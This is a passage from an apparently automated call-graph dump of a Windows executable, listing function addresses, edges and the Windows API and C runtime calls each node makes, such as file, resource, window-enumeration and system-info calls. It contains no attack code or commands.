e541a7 83 API calls 107653->107654 107655 e9cd7b 107654->107655 107656 e745ec __crtCompareStringA_stat 47 API calls 107655->107656 107657 e9cd82 107656->107657 107658 e745ec __crtCompareStringA_stat 47 API calls 107657->107658 107659 e9cd8c 107658->107659 107660 e5417d 64 API calls 107659->107660 107661 e9cda0 107660->107661 107662 e9c846 GetSystemTimeAsFileTime 107661->107662 107663 e9cdb3 107662->107663 107664 e9cdc8 107663->107664 107665 e9cddd 107663->107665 107668 e728ca _free 47 API calls 107664->107668 107666 e9cde3 107665->107666 107667 e9ce42 107665->107667 107910 e9c251 107666->107910 107671 e728ca _free 47 API calls 107667->107671 107669 e9cdce 107668->107669 107672 e728ca _free 47 API calls 107669->107672 107674 e9cd07 107671->107674 107672->107674 107674->107547 107676 e53e39 107674->107676 107675 e728ca _free 47 API calls 107675->107674 107677 e53e43 107676->107677 107678 e53e4a 107676->107678 107679 e74274 __fcloseall 83 API calls 107677->107679 107680 e53e59 107678->107680 107681 e53e6a FreeLibrary 107678->107681 107679->107678 107680->107547 107681->107680 107731 e53f20 107682->107731 107685 e53f85 107687 e53f96 107685->107687 107688 e53f8d FreeLibrary 107685->107688 107689 e74129 107687->107689 107688->107687 107739 e7413e 107689->107739 107691 e53fba 107691->107622 107691->107623 107818 e53eb3 107692->107818 107695 e53e9f 107697 e53eb1 107695->107697 107698 e53ea8 FreeLibrary 107695->107698 107699 e54010 107697->107699 107698->107697 107700 e7010a 48 API calls 107699->107700 107701 e54025 107700->107701 107702 e54bce 48 API calls 107701->107702 107703 e54031 _memmove 107702->107703 107705 e54161 107703->107705 107706 e54129 107703->107706 107709 e5406c 107703->107709 107704 e541cb 57 API calls 107714 e54075 107704->107714 107837 e9d03f 93 API calls 107705->107837 107826 e531f2 CreateStreamOnHGlobal 107706->107826 107709->107704 107710 e5417d 64 API calls 107710->107714 107712 e54109 107712->107630 107713 ec5794 107715 e541a7 83 API calls 107713->107715 107714->107710 107714->107712 107714->107713 107832 e541a7 107714->107832 107716 ec57a8 107715->107716 107717 e5417d 64 API calls 107716->107717 107717->107712 107719 ec587d 107718->107719 107720 e5418f 107718->107720 107861 e744ae 107720->107861 107723 e9c846 107881 e9c6a0 107723->107881 107725 e9c85c 107725->107638 107727 ec58bf 107726->107727 107728 e541da 107726->107728 107886 e74af5 107728->107886 107730 e541e2 107730->107640 107735 e53f32 107731->107735 107734 e53f08 LoadLibraryA GetProcAddress 107734->107685 107736 e53f28 107735->107736 107737 e53f3b LoadLibraryA 107735->107737 107736->107685 107736->107734 107737->107736 107738 e53f4c GetProcAddress 107737->107738 107738->107736 107742 e7414a __getstream 107739->107742 107740 e7415d 107787 e7889e 47 API calls __getptd_noexit 107740->107787 107742->107740 107744 e7418e 107742->107744 107743 e74162 107788 e77aa0 8 API calls __wcsnicmp 107743->107788 107758 e7f278 107744->107758 107747 e74193 107748 e7419c 107747->107748 107749 e741a9 107747->107749 107789 e7889e 47 API calls __getptd_noexit 107748->107789 107751 e741d3 107749->107751 107752 e741b3 107749->107752 107772 e7f390 107751->107772 107790 e7889e 47 API calls __getptd_noexit 107752->107790 107753 e7416d @_EH4_CallFilterFunc@8 __getstream 107753->107691 107759 e7f284 __getstream 107758->107759 107760 e78984 __lock 47 API calls 107759->107760 107761 e7f292 107760->107761 107762 e7f309 107761->107762 107767 e78a0c __mtinitlocknum 47 API calls 107761->107767 107770 e7f302 107761->107770 107795 e75ade 48 API calls __lock 107761->107795 107796 e75b48 LeaveCriticalSection LeaveCriticalSection _doexit 107761->107796 107797 e77660 47 API calls __crtCompareStringA_stat 107762->107797 107765 e7f310 107766 e7f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 107765->107766 107765->107770 107766->107770 107767->107761 107769 e7f37c __getstream 107769->107747 107792 e7f387 107770->107792 107781 e7f3b0 __wopenfile 107772->107781 107773 e7f3ca 107802 e7889e 47 API calls __getptd_noexit 107773->107802 107775 e7f585 107775->107773 107779 e7f5e8 107775->107779 107776 e7f3cf 107803 e77aa0 8 API calls __wcsnicmp 107776->107803 107778 e741de 107791 e74200 LeaveCriticalSection LeaveCriticalSection _fseek 107778->107791 107799 e87179 107779->107799 107781->107773 107781->107775 107804 e7247b 59 API calls 3 library calls 107781->107804 107783 e7f57e 107783->107775 107805 e7247b 59 API calls 3 library calls 107783->107805 107785 e7f59d 107785->107775 107806 e7247b 59 API calls 3 library calls 107785->107806 107787->107743 107788->107753 107789->107753 107790->107753 107791->107753 107798 e78ae8 LeaveCriticalSection 107792->107798 107794 e7f38e 107794->107769 107795->107761 107796->107761 107797->107765 107798->107794 107807 e86961 107799->107807 107801 e87192 107801->107778 107802->107776 107803->107778 107804->107783 107805->107785 107806->107775 107810 e8696d __getstream 107807->107810 107808 e8697f 107809 e7889e __lseek_nolock 47 API calls 107808->107809 107811 e86984 107809->107811 107810->107808 107812 e869b6 107810->107812 107814 e77aa0 __wcsnicmp 8 API calls 107811->107814 107813 e86a28 __wsopen_helper 110 API calls 107812->107813 107815 e869d3 107813->107815 107817 e8698e __getstream 107814->107817 107816 e869fc __wsopen_helper LeaveCriticalSection 107815->107816 107816->107817 107817->107801 107822 e53ec5 107818->107822 107821 e53ef0 LoadLibraryA GetProcAddress 107821->107695 107823 e53e91 107822->107823 107824 e53ece LoadLibraryA 107822->107824 107823->107695 107823->107821 107824->107823 107825 e53edf GetProcAddress 107824->107825 107825->107823 107827 e5320c FindResourceExW 107826->107827 107828 e53229 107826->107828 107827->107828 107829 ec57d3 LoadResource 107827->107829 107828->107709 107829->107828 107830 ec57e8 SizeofResource 107829->107830 107830->107828 107831 ec57fc LockResource 107830->107831 107831->107828 107833 e541b6 107832->107833 107836 ec589d 107832->107836 107838 e7471d 107833->107838 107835 e541c4 107835->107714 107837->107709 107841 e74729 __getstream 107838->107841 107839 e74737 107851 e7889e 47 API calls __getptd_noexit 107839->107851 107841->107839 107842 e7475d 107841->107842 107853 e75a9f 107842->107853 107843 e7473c 107852 e77aa0 8 API calls __wcsnicmp 107843->107852 107846 e74763 107859 e7468e 81 API calls 5 library calls 107846->107859 107848 e74772 107860 e74794 LeaveCriticalSection LeaveCriticalSection _fseek 107848->107860 107850 e74747 __getstream 107850->107835 107851->107843 107852->107850 107854 e75ad1 EnterCriticalSection 107853->107854 107855 e75aaf 107853->107855 107858 e75ac7 107854->107858 107855->107854 107856 e75ab7 107855->107856 107857 e78984 __lock 47 API calls 107856->107857 107857->107858 107858->107846 107859->107848 107860->107850 107864 e744c9 107861->107864 107863 e541a0 107863->107723 107865 e744d5 __getstream 107864->107865 107866 e74518 107865->107866 107867 e74510 __getstream 107865->107867 107869 e744eb _memset 107865->107869 107868 e75a9f __lock_file 48 API calls 107866->107868 107867->107863 107870 e7451e 107868->107870 107877 e7889e 47 API calls __getptd_noexit 107869->107877 107879 e742eb 62 API calls 6 library calls 107870->107879 107873 e74505 107878 e77aa0 8 API calls __wcsnicmp 107873->107878 107874 e74534 107880 e74552 LeaveCriticalSection LeaveCriticalSection _fseek 107874->107880 107877->107873 107878->107867 107879->107874 107880->107867 107884 e740da GetSystemTimeAsFileTime 107881->107884 107883 e9c6af 107883->107725 107885 e74108 __aulldiv 107884->107885 107885->107883 107887 e74b01 __getstream 107886->107887 107888 e74b24 107887->107888 107889 e74b0f 107887->107889 107891 e75a9f __lock_file 48 API calls 107888->107891 107900 e7889e 47 API calls __getptd_noexit 107889->107900 107893 e74b2a 107891->107893 107892 e74b14 107901 e77aa0 8 API calls __wcsnicmp 107892->107901 107902 e7479c 55 API calls 7 library calls 107893->107902 107896 e74b35 107903 e74b55 LeaveCriticalSection LeaveCriticalSection _fseek 107896->107903 107898 e74b47 107899 e74b1f __getstream 107898->107899 107899->107730 107900->107892 107901->107899 107902->107896 107903->107898 107907 e9ce6d __tzset_nolock _wcscmp 107904->107907 107905 e5417d 64 API calls 107905->107907 107906 e9c846 GetSystemTimeAsFileTime 107906->107907 107907->107905 107907->107906 107908 e9cd03 107907->107908 107909 e541a7 83 API calls 107907->107909 107908->107646 107908->107674 107909->107907 107911 e9c26a 107910->107911 107912 e9c25c 107910->107912 107914 e9c2af 107911->107914 107915 e74129 117 API calls 107911->107915 107940 e9c273 107911->107940 107913 e74129 117 API calls 107912->107913 107913->107911 107941 e9c4d4 64 API calls 3 library calls 107914->107941 107917 e9c294 107915->107917 107917->107914 107919 e9c29d 107917->107919 107918 e9c2f3 107920 e9c318 107918->107920 107921 e9c2f7 107918->107921 107919->107940 107951 e74274 107919->107951 107942 e9c0d1 107920->107942 107924 e74274 __fcloseall 83 API calls 107921->107924 107925 e9c304 107921->107925 107924->107925 107929 e74274 __fcloseall 83 API calls 107925->107929 107925->107940 107927 e9c346 107964 e9c376 90 API calls 107927->107964 107928 e9c326 107930 e9c333 107928->107930 107932 e74274 __fcloseall 83 API calls 107928->107932 107929->107940 107934 e74274 __fcloseall 83 API calls 107930->107934 107930->107940 107932->107930 107933 e9c34d 107965 e9c450 107933->107965 107934->107940 107937 e9c361 107939 e74274 __fcloseall 83 API calls 107937->107939 107937->107940 107938 e74274 __fcloseall 83 API calls 107938->107937 107939->107940 107940->107675 107941->107918 107943 e745ec __crtCompareStringA_stat 47 API calls 107942->107943 107944 e9c0e0 107943->107944 107945 e745ec __crtCompareStringA_stat 47 API calls 107944->107945 107946 e9c0f4 107945->107946 107947 e745ec __crtCompareStringA_stat 47 API calls 107946->107947 107948 e9c108 107947->107948 107949 e9c450 47 API calls 107948->107949 107950 e9c11b 107948->107950 107949->107950 107950->107927 107950->107928 107952 e74280 __getstream 107951->107952 107953 e74294 107952->107953 107954 e742ac 107952->107954 107989 e7889e 47 API calls __getptd_noexit 107953->107989 107956 e75a9f __lock_file 48 API calls 107954->107956 107961 e742a4 __getstream 107954->107961 107958 e742be 107956->107958 107957 e74299 107990 e77aa0 8 API calls __wcsnicmp 107957->107990 107973 e74208 107958->107973 107961->107940 107964->107933 107966 e9c45d 107965->107966 107967 e9c463 107965->107967 107968 e728ca _free 47 API calls 107966->107968 107969 e728ca _free 47 API calls 107967->107969 107970 e9c474 107967->107970 107968->107967 107969->107970 107971 e9c354 107970->107971 107972 e728ca _free 47 API calls 107970->107972 107971->107937 107971->107938 107972->107971 107974 e74217 107973->107974 107975 e7422b 107973->107975 108032 e7889e 47 API calls __getptd_noexit 107974->108032 107978 e74227 107975->107978 107992 e73914 107975->107992 107977 e7421c 108033 e77aa0 8 API calls __wcsnicmp 107977->108033 107991 e742e3 LeaveCriticalSection LeaveCriticalSection _fseek 107978->107991 107985 e74245 108009 e7f782 107985->108009 107987 e7424b 107987->107978 107988 e728ca _free 47 API calls 107987->107988 107988->107978 107989->107957 107990->107961 107991->107961 107993 e73927 107992->107993 107997 e7394b 107992->107997 107994 e735c3 __flswbuf 47 API calls 107993->107994 107993->107997 107995 e73944 107994->107995 108034 e7bd14 78 API calls 6 library calls 107995->108034 107998 e7f8e6 107997->107998 107999 e7f8f3 107998->107999 108001 e7423f 107998->108001 108000 e728ca _free 47 API calls 107999->108000 107999->108001 108000->108001 108002 e735c3 108001->108002 108003 e735e2 108002->108003 108004 e735cd 108002->108004 108003->107985 108035 e7889e 47 API calls __getptd_noexit 108004->108035 108006 e735d2 108036 e77aa0 8 API calls __wcsnicmp 108006->108036 108008 e735dd 108008->107985 108010 e7f78e __getstream 108009->108010 108011 e7f796 108010->108011 108012 e7f7ae 108010->108012 108061 e7886a 47 API calls __getptd_noexit 108011->108061 108013 e7f82b 108012->108013 108019 e7f7d8 108012->108019 108065 e7886a 47 API calls __getptd_noexit 108013->108065 108015 e7f79b 108062 e7889e 47 API calls __getptd_noexit 108015->108062 108018 e7f830 108066 e7889e 47 API calls __getptd_noexit 108018->108066 108037 e7b6a0 108019->108037 108022 e7f838 108067 e77aa0 8 API calls __wcsnicmp 108022->108067 108023 e7f7de 108026 e7f7f1 108023->108026 108027 e7f7fc 108023->108027 108025 e7f7a3 __getstream 108025->107987 108046 e7f84c 108026->108046 108063 e7889e 47 API calls __getptd_noexit 108027->108063 108030 e7f7f7 108064 e7f823 LeaveCriticalSection __unlock_fhandle 108030->108064 108032->107977 108033->107978 108034->107997 108035->108006 108036->108008 108038 e7b6ac __getstream 108037->108038 108039 e7b6f9 EnterCriticalSection 108038->108039 108040 e78984 __lock 47 API calls 108038->108040 108042 e7b71f __getstream 108039->108042 108041 e7b6d0 108040->108041 108043 e7b6ed 108041->108043 108044 e7b6db InitializeCriticalSectionAndSpinCount 108041->108044 108042->108023 108045 e7b723 ___lock_fhandle LeaveCriticalSection 108043->108045 108044->108043 108045->108039 108047 e7b957 __lseek_nolock 47 API calls 108046->108047 108050 e7f85a 108047->108050 108048 e7f8b0 108049 e7b8d1 __free_osfhnd 48 API calls 108048->108049 108052 e7f8b8 108049->108052 108050->108048 108051 e7f88e 108050->108051 108053 e7b957 __lseek_nolock 47 API calls 108050->108053 108051->108048 108054 e7b957 __lseek_nolock 47 API calls 108051->108054 108055 e7f8da 108052->108055 108058 e7887d __dosmaperr 47 API calls 108052->108058 108056 e7f885 108053->108056 108057 e7f89a CloseHandle 108054->108057 108055->108030 108059 e7b957 __lseek_nolock 47 API calls 108056->108059 108057->108048 108060 e7f8a6 GetLastError 108057->108060 108058->108055 108059->108051 108060->108048 108061->108015 108062->108025 108063->108030 108064->108025 108065->108018 108066->108022 108067->108025 108068->107556 108069->107559 108070->107563 108071->107576 108072->107578 108073->107575 108074->107583 108075->107588 108076->107602 108077->107599 108078->107610 108080 e531c7 108079->108080 108081 ec4aa5 GetFullPathNameW 108079->108081 108136 e53bcf 108080->108136 108083 ec4abd 108081->108083 108084 e531cd GetFullPathNameW 108085 e531e7 108084->108085 108085->107421 108087 e53a8b SHGetDesktopFolder 108086->108087 108090 e53ade 108086->108090 108088 e53a99 108087->108088 108087->108090 108089 e53ac8 SHGetPathFromIDListW 108088->108089 108088->108090 108089->108090 108090->107424 108092 e53b72 108091->108092 108093 e53ba9 108091->108093 108094 e53bcf 48 API calls 108092->108094 108093->108092 108095 e71bc7 _W_store_winword 59 API calls 108093->108095 108098 ec33e5 108093->108098 108096 e53b7d 108094->108096 108095->108093 108140 e5197e 108096->108140 108100 e5197e 48 API calls 108101 e53b9f 108100->108101 108102 e53dcb 108101->108102 108103 e53f9b 136 API calls 108102->108103 108104 e53def 108103->108104 108105 ec39f9 108104->108105 108107 e53f9b 136 API calls 108104->108107 108106 e9cc82 122 API calls 108105->108106 108108 ec3a0e 108106->108108 108109 e53e02 108107->108109 108110 ec3a2f 108108->108110 108111 ec3a12 108108->108111 108109->108105 108112 e53e0a 108109->108112 108116 e7010a 48 API calls 108110->108116 108115 e53e39 84 API calls 108111->108115 108113 e53e16 108112->108113 108114 ec3a1a 108112->108114 108170 e5bdf0 163 API calls 8 library calls 108113->108170 108171 e9757b 87 API calls _wprintf 108114->108171 108115->108114 108127 ec3a74 Mailbox 108116->108127 108119 e53e2e 108119->107422 108120 ec3a28 108120->108110 108121 ec3c24 108122 e728ca _free 47 API calls 108121->108122 108123 ec3c2c 108122->108123 108124 e53e39 84 API calls 108123->108124 108126 ec3c35 108124->108126 108130 e728ca _free 47 API calls 108126->108130 108131 e53e39 84 API calls 108126->108131 108173 e932b0 86 API calls 4 library calls 108126->108173 108127->108121 108127->108126 108133 e5caee 48 API calls 108127->108133 108146 e930ac 108127->108146 108149 e9a525 108127->108149 108155 e5b6d0 108127->108155 108164 e5a870 108127->108164 108172 e92fcd 60 API calls 2 library calls 108127->108172 108130->108126 108131->108126 108133->108127 108137 e53bd9 __NMSG_WRITE 108136->108137 108138 e7010a 48 API calls 108137->108138 108139 e53bee _wcscpy 108138->108139 108139->108084 108142 e51990 108140->108142 108145 e519af _memmove 108140->108145 108141 e7010a 48 API calls 108143 e519c6 108141->108143 108144 e7010a 48 API calls 108142->108144 108143->108100 108144->108145 108145->108141 108147 e7010a 48 API calls 108146->108147 108148 e930dc _memmove 108147->108148 108148->108127 108148->108148 108151 e9a530 108149->108151 108150 e7010a 48 API calls 108152 e9a547 108150->108152 108151->108150 108153 e9a556 108152->108153 108154 e5caee 48 API calls 108152->108154 108153->108127 108154->108153 108156 e5b789 108155->108156 108163 e5b6e3 _memmove 108155->108163 108158 e7010a 48 API calls 108156->108158 108157 e7010a 48 API calls 108159 e5b6ea 108157->108159 108158->108163 108160 e5b71b 108159->108160 108161 e7010a 48 API calls 108159->108161 108160->108127 108162 e5b74d 108161->108162 108162->108127 108163->108157 108165 e5a883 108164->108165 108168 e5a93d 108164->108168 108166 e7010a 48 API calls 108165->108166 108167 e5a8c1 108165->108167 108165->108168 108166->108167 108167->108168 108169 e7010a 48 API calls 108167->108169 108168->108127 108169->108167 108170->108119 108171->108120 108172->108127 108173->108126 108175 e5a72c 108174->108175 108181 e5a848 108174->108181 108176 e7010a 48 API calls 108175->108176 108175->108181 108177 e5a753 108176->108177 108178 e7010a 48 API calls 108177->108178 108179 e5a7c5 108178->108179 108179->108181 108183 e5a870 48 API calls 108179->108183 108184 e5b6d0 48 API calls 108179->108184 108187 e5ace0 91 API calls 2 library calls 108179->108187 108188 e9a3ee 48 API calls 108179->108188 108181->107430 108183->108179 108184->108179 108185->107433 108186->107435 108187->108179 108188->108179 108190 ec4ad8 EnumResourceNamesW 108189->108190 108191 e531a2 LoadImageW 108189->108191 108192 e53118 RegisterClassExW 108190->108192 108191->108192 108193 e52f58 7 API calls 108192->108193 108193->107449 108195 e5e7fd 108194->108195 108196 e5e80f 108194->108196 108273 e5dcd0 108195->108273 108304 e9d520 86 API calls 4 library calls 108196->108304 108198 e5e806 108198->107509 108200 ec98e8 108200->108200 108312 e5325d 108201->108312 108203 e5323b 108204 ec66cc 108203->108204 108205 e5325a 108203->108205 108204->108203 108316 e9a31d 13 API calls Mailbox 108204->108316 108205->107455 108207 e6ec33 108205->108207 108208 e5caee 48 API calls 108207->108208 108209 e6ec5d 108208->108209 108210 e5d380 55 API calls 108209->108210 108211 e6ec6d Mailbox 108210->108211 108212 e5caee 48 API calls 108211->108212 108213 e6ec96 108212->108213 108214 e5d380 55 API calls 108213->108214 108215 e6eca6 Mailbox 108214->108215 108216 e6ecdb 108215->108216 108318 e6cf79 49 API calls 108215->108318 108319 e9d80a 255 API calls 108215->108319 108216->107460 108219->107509 108220->107509 108221->107509 108222->107509 108223->107509 108224->107509 108225->107464 108226->107509 108227->107509 108228->107501 108229->107501 108230->107501 108232 e5fa60 108231->108232 108240 e5fa8e Mailbox _memmove 108231->108240 108233 e7010a 48 API calls 108232->108233 108233->108240 108234 e61063 108344 e9d520 86 API calls 4 library calls 108234->108344 108235 e6105e 108236 e5c935 48 API calls 108235->108236 108237 e5fbf1 Mailbox 108236->108237 108237->107509 108238 e5d3d2 48 API calls 108238->108240 108240->108234 108240->108235 108240->108237 108240->108238 108243 e60dee 108240->108243 108244 e7010a 48 API calls 108240->108244 108245 ecb772 108240->108245 108246 e60dfa 108240->108246 108250 e5c935 48 API calls 108240->108250 108252 e60e83 108240->108252 108253 e60119 108240->108253 108256 e8a599 InterlockedDecrement 108240->108256 108257 e71b2a 52 API calls __cinit 108240->108257 108262 e61230 108240->108262 108263 e5fa40 255 API calls 108240->108263 108265 e610f1 Mailbox 108240->108265 108267 ecb583 108240->108267 108320 eb798d 108240->108320 108325 e5f6d0 255 API calls 2 library calls 108240->108325 108326 e61620 59 API calls Mailbox 108240->108326 108337 eaee52 82 API calls 2 library calls 108240->108337 108338 eaef9d 90 API calls Mailbox 108240->108338 108339 e9b020 48 API calls 108240->108339 108340 eae713 255 API calls Mailbox 108240->108340 108327 e5d89e 108243->108327 108244->108240 108346 e9d520 86 API calls 4 library calls 108245->108346 108248 e5d89e 50 API calls 108246->108248 108248->108252 108250->108240 108258 e5caee 48 API calls 108252->108258 108345 e9d520 86 API calls 4 library calls 108253->108345 108255 ecb7d2 108256->108240 108257->108240 108258->108265 108262->108237 108343 e9d520 86 API calls 4 library calls 108262->108343 108263->108240 108342 e9d520 86 API calls 4 library calls 108265->108342 108341 e9d520 86 API calls 4 library calls 108267->108341 108270->107501 108271->107501 108272->107501 108274 e5fa40 255 API calls 108273->108274 108277 e5dd0f _memmove 108274->108277 108276 ec8ddc 108276->108276 108278 e5dd70 108277->108278 108279 e5e12b Mailbox 108277->108279 108286 ec8dbe 108277->108286 108287 e7010a 48 API calls 108277->108287 108288 e5deb7 108277->108288 108299 e5df29 108277->108299 108278->108198 108281 e7010a 48 API calls 108279->108281 108280 e5e051 108282 ec8daf 108280->108282 108283 e5e066 108280->108283 108295 e5decb _memmove 108281->108295 108310 ead1da 50 API calls 108282->108310 108285 e7010a 48 API calls 108283->108285 108293 e5df64 108285->108293 108311 e9d520 86 API calls 4 library calls 108286->108311 108287->108277 108288->108279 108290 e5dec4 108288->108290 108289 e7010a 48 API calls 108291 e5def6 108289->108291 108292 e7010a 48 API calls 108290->108292 108291->108299 108305 e64320 255 API calls 108291->108305 108292->108295 108293->108198 108294 ec8d9e 108309 e9d520 86 API calls 4 library calls 108294->108309 108295->108289 108295->108291 108295->108299 108299->108280 108299->108293 108299->108294 108300 ec8d76 108299->108300 108302 ec8d51 108299->108302 108306 e55322 255 API calls 108299->108306 108308 e9d520 86 API calls 4 library calls 108300->108308 108307 e9d520 86 API calls 4 library calls 108302->108307 108304->108200 108305->108299 108306->108299 108307->108293 108308->108293 108309->108293 108310->108286 108311->108276 108313 e53269 108312->108313 108314 e5327f 108313->108314 108317 ea592d InternetCloseHandle InternetCloseHandle WaitForSingleObject 108313->108317 108314->108203 108316->108204 108317->108313 108318->108215 108319->108215 108347 e519ee 108320->108347 108324 eb79a4 108324->108240 108325->108240 108326->108240 108328 e5d8ac 108327->108328 108334 e5d8db Mailbox 108327->108334 108329 e5d8ff 108328->108329 108333 e5d8b2 Mailbox 108328->108333 108332 e5c935 48 API calls 108329->108332 108330 e5d8c7 108330->108334 108335 ec4e72 VariantClear 108330->108335 108331 ec4e9b 108331->108334 108488 e8a599 InterlockedDecrement 108331->108488 108332->108334 108333->108330 108333->108331 108334->108246 108335->108334 108337->108240 108338->108240 108339->108240 108340->108240 108341->108265 108342->108237 108343->108234 108344->108253 108345->108245 108346->108255 108348 e5d89e 50 API calls 108347->108348 108349 e51a08 108348->108349 108350 ecdb7d 108349->108350 108351 e51a12 108349->108351 108352 e57e53 48 API calls 108350->108352 108373 e584a6 108351->108373 108354 ecdb8d 108352->108354 108354->108354 108355 e51a1f 108356 e5c935 48 API calls 108355->108356 108357 e51a2d 108356->108357 108358 e51dce 108357->108358 108359 e51de4 Mailbox 108358->108359 108360 ecdb26 108359->108360 108363 e51dfd 108359->108363 108361 ecdb2b IsWindow 108360->108361 108364 ecdb3f 108361->108364 108365 e51e51 108361->108365 108362 e51e46 108362->108365 108368 ecdb65 IsWindow 108362->108368 108363->108362 108366 e584a6 81 API calls 108363->108366 108449 e5200a 48 API calls 108364->108449 108365->108324 108369 e51e17 108366->108369 108368->108364 108368->108365 108395 e51f04 108369->108395 108370 ecdb4b 108372 e5197e 48 API calls 108370->108372 108372->108365 108374 e584be 108373->108374 108391 e584ba 108373->108391 108375 e584d2 108374->108375 108376 ec5494 108374->108376 108379 ec5592 __i64tow 108374->108379 108385 e584ea __itow Mailbox _wcscpy 108374->108385 108393 e7234b 80 API calls 4 library calls 108375->108393 108377 ec557a 108376->108377 108381 ec549d 108376->108381 108394 e7234b 80 API calls 4 library calls 108377->108394 108379->108379 108384 ec54bc 108381->108384 108381->108385 108382 e7010a 48 API calls 108383 e584f4 108382->108383 108387 e5caee 48 API calls 108383->108387 108383->108391 108386 e7010a 48 API calls 108384->108386 108385->108382 108388 ec54d9 108386->108388 108387->108391 108389 e7010a 48 API calls 108388->108389 108390 ec54ff 108389->108390 108390->108391 108392 e5caee 48 API calls 108390->108392 108391->108355 108392->108391 108393->108385 108394->108385 108396 e51f1a Mailbox 108395->108396 108397 e5c935 48 API calls 108396->108397 108398 e51f3e 108397->108398 108399 e5c935 48 API calls 108398->108399 108400 e51f49 108399->108400 108401 e57e53 48 API calls 108400->108401 108402 e51f59 108401->108402 108403 e5d3d2 48 API calls 108402->108403 108404 e51f87 108403->108404 108405 e5d3d2 48 API calls 108404->108405 108406 e51f90 108405->108406 108407 e5d3d2 48 API calls 108406->108407 108408 e51f99 108407->108408 108409 ec2569 108408->108409 108410 e51fac 108408->108410 108451 e8e4ea 60 API calls 3 library calls 108409->108451 108411 ec2583 108410->108411 108413 e51fbe GetForegroundWindow 108410->108413 108414 e5a4f6 48 API calls 108411->108414 108450 e5200a 48 API calls 108413->108450 108416 ec2597 108414->108416 108418 ec2899 108416->108418 108421 e5a4f6 48 API calls 108416->108421 108417 e51fcc 108419 e5197e 48 API calls 108417->108419 108420 ec28ab 108418->108420 108423 e5c935 48 API calls 108418->108423 108422 e51fe1 108419->108422 108424 ec28d6 108420->108424 108426 e5b8a7 48 API calls 108420->108426 108448 ec25ad 108421->108448 108435 e51fe4 Mailbox 108422->108435 108423->108420 108425 ec28f1 108424->108425 108431 e5b8a7 48 API calls 108424->108431 108427 ec28fc GetDesktopWindow EnumChildWindows 108425->108427 108428 ec290b EnumWindows 108425->108428 108429 ec28ce CharUpperBuffW 108426->108429 108432 ec2911 108427->108432 108428->108432 108457 e8e69d 108428->108457 108429->108424 108433 ec28e9 CharUpperBuffW 108431->108433 108455 e8e44e 48 API calls Mailbox 108432->108455 108433->108425 108435->108362 108436 ec2922 Mailbox 108437 ec2940 108436->108437 108456 e5200a 48 API calls 108436->108456 108439 ec2842 GetForegroundWindow 108441 ec283c 108439->108441 108440 ec281d 108442 ec282a IsWindow 108440->108442 108441->108435 108441->108439 108454 e5200a 48 API calls 108441->108454 108442->108435 108442->108441 108444 e5c935 48 API calls 108444->108448 108446 e55cf6 47 API calls 108446->108448 108447 e72241 48 API calls 108447->108448 108448->108418 108448->108435 108448->108440 108448->108441 108448->108444 108448->108446 108448->108447 108452 e8d68d 49 API calls 108448->108452 108453 e55be9 61 API calls 108448->108453 108449->108370 108450->108417 108451->108411 108452->108448 108453->108448 108454->108441 108455->108436 108456->108437 108458 e8e6a9 108457->108458 108459 e8e6d4 GetClassNameW 108458->108459 108460 e8e6f7 _wcscmp 108458->108460 108459->108460 108461 e8e70d GetWindowTextW 108460->108461 108473 e8e7b3 _wcscmp 108460->108473 108463 e8e726 __NMSG_WRITE 108461->108463 108475 e8e73d _wcscmp __wopenfile _wcsstr 108461->108475 108462 e8e7c8 GetWindowTextW 108465 e5caee 48 API calls 108462->108465 108466 e8e730 CharUpperBuffW 108463->108466 108464 e8e849 GetClassNameW 108467 e5caee 48 API calls 108464->108467 108468 e8e7e9 108465->108468 108466->108475 108470 e8e86a 108467->108470 108485 e57e36 48 API calls 108468->108485 108469 e8e877 Mailbox 108480 e8e8a6 108469->108480 108487 e8e970 SendMessageTimeoutW EnumChildWindows 108469->108487 108486 e57e36 48 API calls 108470->108486 108471 e8e8b7 GetWindowRect 108478 e8e8cc 108471->108478 108473->108462 108483 e8e833 _wcscmp 108473->108483 108474 e8e791 GetClassNameW 108474->108473 108475->108473 108475->108474 108479 e8e954 108478->108479 108481 e5197e 48 API calls 108478->108481 108480->108471 108480->108478 108481->108479 108482 e8e7f6 Mailbox 108482->108483 108484 e8e811 GetClassNameW 108482->108484 108483->108464 108483->108469 108484->108483 108485->108482 108486->108469 108487->108480 108488->108334 108490 e71eee __getstream 108489->108490 108491 e78984 __lock 47 API calls 108490->108491 108495 e71ef5 _doexit 108491->108495 108494 e7200b __getstream 108494->107190 108502 e71ffc 108495->108502 108497 e71ff3 108498 e71d65 _fast_error_exit 3 API calls 108497->108498 108499 e71ffc 108498->108499 108500 e72009 108499->108500 108507 e78ae8 LeaveCriticalSection 108499->108507 108500->107190 108503 e72002 108502->108503 108504 e71fdc 108502->108504 108508 e78ae8 LeaveCriticalSection 108503->108508 108504->108494 108506 e78ae8 LeaveCriticalSection 108504->108506 108506->108497 108507->108500 108508->108504 108509 ec1e8b 108514 e6e44f 108509->108514 108513 ec1e9a 108515 e7010a 48 API calls 108514->108515 108516 e6e457 108515->108516 108517 e6e46b 108516->108517 108522 e6e74b 108516->108522 108521 e71b2a 52 API calls __cinit 108517->108521 108521->108513 108523 e6e463 108522->108523 108524 e6e754 108522->108524 108526 e6e47b 108523->108526 108554 e71b2a 52 API calls __cinit 108524->108554 108527 e5d3d2 48 API calls 108526->108527 108528 e6e492 GetVersionExW 108527->108528 108529 e57e53 48 API calls 108528->108529 108530 e6e4d5 108529->108530 108555 e6e5f8 108530->108555 108536 ec29f9 108537 e6e576 108541 e6e59e 108537->108541 108542 e6e5ec GetSystemInfo 108537->108542 108538 e6e55f GetCurrentProcess 108572 e6e70e LoadLibraryA GetProcAddress 108538->108572 108566 e6e694 108541->108566 108544 e6e5c9 108542->108544 108546 e6e5d7 FreeLibrary 108544->108546 108547 e6e5dc 108544->108547 108546->108547 108547->108517 108548 e6e5e4 GetSystemInfo 108551 e6e5be 108548->108551 108549 e6e5b4 108569 e6e437 108549->108569 108551->108544 108553 e6e5c4 FreeLibrary 108551->108553 108553->108544 108554->108523 108556 e6e601 108555->108556 108557 e5a2fb 48 API calls 108556->108557 108558 e6e4dd 108557->108558 108559 e6e617 108558->108559 108560 e6e625 108559->108560 108561 e5a2fb 48 API calls 108560->108561 108562 e6e4e9 108561->108562 108562->108536 108563 e6e6d1 108562->108563 108573 e6e6e3 108563->108573 108577 e6e6a6 108566->108577 108570 e6e694 2 API calls 108569->108570 108571 e6e43f GetNativeSystemInfo 108570->108571 108571->108551 108572->108537 108574 e6e55b 108573->108574 108575 e6e6ec LoadLibraryA 108573->108575 108574->108537 108574->108538 108575->108574 108576 e6e6fd GetProcAddress 108575->108576 108576->108574 108578 